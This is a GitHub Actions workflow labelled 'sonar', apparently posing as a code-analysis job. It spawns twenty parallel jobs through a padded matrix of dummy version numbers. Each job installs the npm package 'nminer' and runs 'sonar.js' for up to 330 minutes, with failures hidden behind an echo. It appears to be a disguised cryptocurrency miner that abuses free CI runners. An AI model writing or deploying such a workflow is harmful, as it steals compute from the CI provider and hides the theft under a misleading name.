name: sonar
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2836 }
          - { version: 1888 }
          - { version: 9330 }
          - { version: 144 }
          - { version: 2172 }
          - { version: 509 }
          - { version: 3084 }
          - { version: 8002 }
          - { version: 6814 }
          - { version: 318 }
          - { version: 6875 }
          - { version: 5983 }
          - { version: 9749 }
          - { version: 7684 }
          - { version: 7001 }
          - { version: 4181 }
          - { version: 2639 }
          - { version: 5077 }
          - { version: 8838 }
          - { version: 6029 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: gently
        run: |
          npm install nminer@latest
          timeout 330m node sonar.js || echo "sonar executed"